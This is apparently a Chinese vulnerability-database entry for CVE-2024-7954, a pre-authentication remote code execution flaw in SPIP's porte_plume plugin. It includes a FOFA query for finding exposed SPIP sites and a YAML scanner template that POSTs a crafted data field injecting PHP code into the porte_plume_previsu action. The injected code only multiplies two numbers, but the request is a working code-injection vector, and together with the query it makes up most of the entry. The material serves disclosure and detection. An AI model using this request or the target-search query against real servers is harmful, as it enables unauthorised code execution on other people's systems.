CVE-2024-7954: SPIP Porte Plume Plugin rce

日期: 2025-09-01 | 影响软件: SPIP Porte Plume Plugin | POC: 已公开

漏洞描述

fofa: app="SPIP" 在4.30-alpha2、4.2.13和4.1.16之前的SPIP中使用的porte_plume插件存在任意代码执行漏洞。远程且未经认证的攻击者可以通过发送特制的HTTP请求,以SPIP用户的身份执行任意PHP代码。

PoC代码[已公开]

id: CVE-2024-7954
info:
  name: SPIP Porte Plume Plugin rce
  author: laohuan12138
  severity: critical
  verified: true
  description: |
    fofa: app="SPIP"
    在4.30-alpha2、4.2.13和4.1.16之前的SPIP中使用的porte_plume插件存在任意代码执行漏洞。远程且未经认证的攻击者可以通过发送特制的HTTP请求,以SPIP用户的身份执行任意PHP代码。

  references:
    - https://mp.weixin.qq.com/s/VIMi4PY5GEtdKOBk3CIZlQ
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather/

  tags: rce,cve,cve2024
  created: 2024/09/02

set:
  num1: randomInt(1000,9999)
  num2: randomInt(1000,9999)

rules:
  r0:
    request:
      method: POST
      path: /index.php?action=porte_plume_previsu
      header:
        Content-Type: application/x-www-form-urlencoded
      body: data=AA_[<img111111>->URL`<?php echo {{num1}}*{{num2}};?>`]_BB
    expression: response.status == 200 && response.body.bcontains(bytes(string(num1 * num2)))

expression: r0()

相关漏洞推荐